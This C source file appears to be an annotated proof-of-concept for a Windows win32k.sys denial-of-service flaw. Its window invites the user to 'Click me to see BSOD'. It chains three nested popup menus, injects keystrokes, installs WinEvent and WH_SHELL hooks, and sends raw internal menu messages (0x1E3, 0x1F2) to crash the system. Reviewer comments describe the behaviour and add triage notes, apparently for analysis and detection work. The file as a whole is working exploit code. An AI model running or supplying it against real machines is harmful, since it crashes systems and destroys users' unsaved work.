DosMsWin.c
//#include "stdafx.h"
#include <windows.h>
/*
 * Shared state for a proof-of-concept whose main window title (set in WinMain)
 * reads "Microsoft Windows Win32k.sys Denial of Service Vulnerability".
 * NOTE(review): no CVE/bulletin identifier or affected Windows build appears
 * anywhere in this file, so patch status cannot be determined from here.
 */
/* Control ID given to the push button in WinMain; WndProc compares it with
 * LOWORD(wParam) when WM_COMMAND arrives. */
#define BSOD_BUTTON 0x9876
/* Three popup menus created in WinMain and chained [0] -> [1] -> [2] as
 * nested submenus. */
HMENU hMenu[3];
/* Count of EVENT_SYSTEM_MENUPOPUPSTART callbacks received so far; incremented
 * on every call to WinEventProc and never reset. */
ULONG MenuLevel = 0;
/* Window handle delivered with the second menu-popup event; the destination
 * of the raw-numbered SendMessage calls in WinEventProc and HookProc. */
HWND hTargetMenuWnd = 0;
/*
 * Inject one press-and-release of the key that produces '1'.
 *
 * The virtual-key value comes from VkKeyScanA('1'). A key-down INPUT is sent
 * first, the thread sleeps 50 ms, then the matching key-up is sent. "1" is
 * also the caption of every menu item built in WinMain, and WinEventProc
 * calls this function on the first menu-popup event.
 * NOTE(review): the keystroke presumably selects the "1" item of the open
 * menu so the next submenu opens - inferred from the captions, not shown here.
 *
 * SendInput's return value is ignored, so a blocked or failed injection
 * passes silently.
 */
void KeyEvent()
{
    INPUT stroke;

    /* phase 0 = key down, phase 1 = key up */
    for (int phase = 0; phase < 2; ++phase)
    {
        memset(&stroke, 0, sizeof(stroke));
        stroke.type = INPUT_KEYBOARD;
        stroke.ki.wVk = VkKeyScanA('1');
        if (phase == 1)
        {
            stroke.ki.dwFlags = KEYEVENTF_KEYUP;
        }
        SendInput(1, &stroke, sizeof(stroke));

        /* Hold the key for 50 ms between the down and up events. */
        if (phase == 0)
        {
            Sleep(50);
        }
    }
}
/*
 * WH_SHELL hook procedure; WinEventProc installs it on the current thread.
 *
 * On HSHELL_WINDOWACTIVATED, once hTargetMenuWnd has been recorded, it sends
 * message 0x1E3 to that window and returns the SendMessage result. Every
 * other notification returns 0.
 *
 * The hook never calls CallNextHookEx, so later hooks in the chain are not
 * invoked from here.
 * NOTE(review): 0x1E3 is sent as a bare number. It sits next to MN_GETHMENU
 * (0x1E1), so it is presumably one of the internal menu-window messages -
 * confirm against a symbolised win32k build before naming it in a detection.
 */
LRESULT CALLBACK HookProc(
    int nCode,
    WPARAM wParam,
    LPARAM lParam)
{
    /* Nothing to do unless this is a window-activation notification and a
     * target menu window has already been captured. */
    if (nCode != HSHELL_WINDOWACTIVATED || hTargetMenuWnd == NULL)
    {
        return 0;
    }

    return SendMessage(hTargetMenuWnd, 0x1E3, 0, 0);
}
/*
 * WinEvent callback that WndProc registers for EVENT_SYSTEM_MENUPOPUPSTART.
 *
 * It counts its own invocations in MenuLevel and acts on the first two only:
 *   1st event - calls KeyEvent() to inject a '1' keystroke.
 *   2nd event - installs HookProc as a thread-local WH_SHELL hook, records
 *               hWnd in hTargetMenuWnd, then sends message 0x1F2 to it.
 * Later events only increment the counter.
 *
 * Triage note: a WinEvent hook on menu-popup start, a WH_SHELL hook on the
 * same thread and SendMessage with raw 0x1Ex/0x1Fx message numbers aimed at
 * a menu window are the observable behaviours of this sample.
 */
VOID CALLBACK WinEventProc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hWnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime)
{
/* The event id and object/child ids are never inspected; only the call count matters. */
++MenuLevel;
if (MenuLevel == 1)
{
KeyEvent();
}
else if (MenuLevel == 2)
{
/* The returned HHOOK is discarded, so the hook is never removed with UnhookWindowsHookEx. */
SetWindowsHookEx(WH_SHELL, HookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
/* hWnd is whatever window the event reported. */
/* NOTE(review): presumably the popup window of the second menu level - confirm. */
hTargetMenuWnd = hWnd;
/* NOTE(review): 0x1F2 is a bare number with no symbolic name in this file; presumably an internal menu-window message - confirm. */
SendMessage(hTargetMenuWnd, 0x1F2, 0, 0);
}
}
/*
 * Window procedure for the main window.
 *
 * WM_COMMAND from the BSOD_BUTTON control registers WinEventProc for
 * menu-popup-start events and then displays hMenu[0] with TrackPopupMenuEx.
 * WM_DESTROY posts the quit message. Every other message is handed to
 * DefWindowProcA.
 *
 * Returns 0 for the messages handled here, otherwise the DefWindowProcA result.
 */
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_COMMAND:
if (LOWORD(wParam) == BSOD_BUTTON)
{
/* Out-of-context WinEvent hook limited to this process and this thread, */
/* covering only EVENT_SYSTEM_MENUPOPUPSTART (min and max are the same). */
/* The returned HWINEVENTHOOK is discarded, so UnhookWinEvent is never called. */
SetWinEventHook(
EVENT_SYSTEM_MENUPOPUPSTART,
EVENT_SYSTEM_MENUPOPUPSTART,
GetModuleHandleA(NULL),
WinEventProc,
GetCurrentProcessId(),
GetCurrentThreadId(),
WINEVENT_OUTOFCONTEXT);
/* Show the outermost popup menu at screen position (20, 20), owned by this window. */
TrackPopupMenuEx(hMenu[0], 0, 20, 20, hWnd, NULL);
}
/* No break here: every WM_COMMAND, whatever its control ID, falls through */
/* into WM_DESTROY and posts WM_QUIT. */
/* NOTE(review): cannot tell from this file whether the fall-through is intentional. */
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProcA(hWnd, message, wParam, lParam);
}
return 0;
}
/*
 * Program entry point: registers the window class, creates the main window
 * and a single push button, builds a three-level chain of popup menus, then
 * runs the message loop.
 *
 * Nothing beyond window and menu setup happens until the button is clicked;
 * the click reaches WndProc as WM_COMMAND with the BSOD_BUTTON id.
 * The window title and button caption state the intent of the sample:
 * a win32k.sys denial of service (system crash).
 *
 * Always returns 0, including when class registration or window creation fails.
 */
int APIENTRY WinMain(
_In_ HINSTANCE hInstance,
_In_opt_ HINSTANCE hPrevInstance,
_In_ PSTR lpCmdLine,
_In_ int nCmdShow)
{
/* Every WNDCLASSA member is assigned explicitly below; the struct is not zero-initialised first. */
WNDCLASSA Class;
Class.style = 0;
Class.lpfnWndProc = WndProc;
Class.cbClsExtra = 0;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.hIcon = NULL;
Class.hCursor = LoadCursor(0, IDC_ARROW);
Class.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
Class.lpszMenuName = NULL;
Class.lpszClassName = "MyWinClass";
/* RegisterClassA returns an ATOM (0 on failure); the code compares it with NULL. */
if (RegisterClassA(&Class) != NULL)
{
HWND hMainWnd = CreateWindowA(
"MyWinClass",
"Microsoft Windows Win32k.sys Denial of Service Vulnerability",
WS_POPUPWINDOW | WS_BORDER | WS_CAPTION | WS_VISIBLE,
0, 0, 500, 200,
NULL,
NULL,
hInstance,
NULL);
if (hMainWnd != NULL)
{
/* For a child window the HMENU argument carries the control ID, here BSOD_BUTTON. */
HWND hButton = CreateWindowA(
"Button",
"Click me to see BSOD",
WS_VISIBLE | WS_CHILD | BS_DEFPUSHBUTTON,
150, 50, 200, 50,
hMainWnd,
(HMENU)BSOD_BUTTON,
hInstance,
NULL);
if (hButton != 0)
{
/* The CreatePopupMenu and AppendMenuA results are not checked. */
hMenu[0] = CreatePopupMenu();
hMenu[1] = CreatePopupMenu();
hMenu[2] = CreatePopupMenu();
/* Each menu gets one item captioned "1": hMenu[0] opens hMenu[1], which opens hMenu[2]. */
/* The item in hMenu[2] also carries MF_POPUP, but its submenu handle is 0. */
AppendMenuA(hMenu[0], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[1], "1");
AppendMenuA(hMenu[1], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[2], "1");
AppendMenuA(hMenu[2], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)0, "1");
MSG msg;
/* Standard message pump; it ends when WndProc posts WM_QUIT. */
/* GetMessage's -1 error return is non-zero, so it would keep the loop running. */
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
}
}
return 0;
}